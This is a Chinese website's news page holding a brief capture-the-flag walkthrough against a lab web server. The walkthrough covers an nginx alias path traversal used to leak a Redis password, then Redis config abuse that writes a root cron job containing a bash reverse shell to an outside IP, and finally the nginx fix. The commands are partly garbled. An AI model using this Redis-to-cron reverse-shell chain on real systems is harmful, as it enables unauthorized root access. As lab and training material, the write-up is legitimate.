恒美微站 Logo 恒美微站
  • 首页
  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心
  • 联系我们

记一次web渗透做题思路解析

  • 首页
  • 资讯中心
  • /
  • 记一次web渗透做题思路解析

相关资讯

Dell G15 5511无线网卡代码43故障:从驱动到硬件的系统性修复指南 2026/8/6 5:10:11
如何用DingFlow在30分钟内构建企业级审批流程设计器 [特殊字符] 2026/8/6 5:10:11
Node.js 中的 spawn 和 exec:子进程执行的不同方式对比 2026/8/6 5:10:11

最新资讯

SpringBoot 整合 Redisson——分布式锁最佳实践
UABEA跨平台Unity资源编辑工具:从查看提取到深度修改实战指南
豆包表格复制到WPS变竖线:DS随心转整理Word和Excel
科目一高效备考:从死记硬背到建立驾驶思维模型的系统方法
AI漫剧二次元少女三视图提示词分享!
Linux入门指南:从内核原理到主流发行版选型与实战

今日推荐

电力系统调度中的源荷不确定性建模与优化实践
VGG-T3技术解析:3D重建速度的革命性突破
深度解析旅游网站建设的意义及其对行业发展的深远影响与核心价值体现

本周热门

ncmdumpGUI:一键解锁网易云音乐ncm文件的终极解决方案
分布式配置中心选型实战:Nacos与Consul在创业场景下的对比
MoneyPrinterPlus实战指南:AI视频批量生成与自动化发布完整解决方案

本月精选

如何用DamaiHelper实现演唱会门票的智能自动化抢购:完整技术解决方案指南
第4篇:59 倍性能差距的索引瓶颈定位——一次教科书级的全表扫描调优
终极歌词批量下载神器:5分钟解决离线音乐库歌词同步难题

记一次web渗透做题思路解析

发布时间:2026/8/6 5:15:12
记一次web渗透做题思路解析 描述你是一名网络安全服务工程师现在需要你对A集团网站进行安全防护找出其中的漏洞点。1、对目标服务器进行信息搜集将web站点监听的端口号和版本信息作为flag值提交提交格式flag{端口版本}由于不知道服务器的IP扫一下找的web站点所以是8081端口发现为nginx服务。2、对目标服务器进行渗透测试将触发漏洞的关键手段作为flag值提交提交格式flag{*****}先看看服务器的web有什么东西发现没有什么爆破一下目录试试返回上级发现目录穿越漏洞这里的触发漏洞的关键手段就是/images,,.3、对目标服务器进行渗透测试发现目标存在数据库服务将该数据库服务的登录密码作为flag值提交提交格式flag{******}扫描端口时可以看到有一个6379端口根据信息看的出是redis数据库这里直接利用目录穿越漏洞得知密码4、对目标服务器进行渗透测试将root家目录中的flag文件内容提交提交格式flag{******}设置监听端口使用密码连接目标redis服务并尝试计划任务提权redis-cli-htarget_ip-pserver_port-aredis_passwordconfigsetdir/var/spool/cronconfigsetdbfilename rootsetxxx\n\n*/1 * * * * /bin/bash -i/dev/tcp/192.168.189.128/4545 01\n\nsave服务器上线5、对目标服务器进行渗透测试对目标web服务存在的漏洞点进行修复将修复时所添加的内容进行md5加密后作为flag值提交提交格式flag{******}通过“images…/”访问时会被替换为别名images/…/导致目录穿越所以只需要在location指定的别名最后添加一个斜杆即可加密一下即可

关于恒美微站

恒美微站专注于为个体商户、工作室提供极简自助建站服务,让每个人都能轻松拥有专业网站。

快速链接

  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心

服务项目

  • 可视化建站
  • 拖拽编辑
  • 主题定制
  • SEO 优化
  • 网站托管

联系方式

  • 📍 地址:北京市朝阳区建国路 88 号
  • 📞 电话:400-888-8888
  • ✉️ 邮箱:info@hmyw.cn
  • 🕐 时间:周一至周日 9:00-18:00

© 2024 恒美微站 hmyw.cn 版权所有 | 京 ICP 备 12345678 号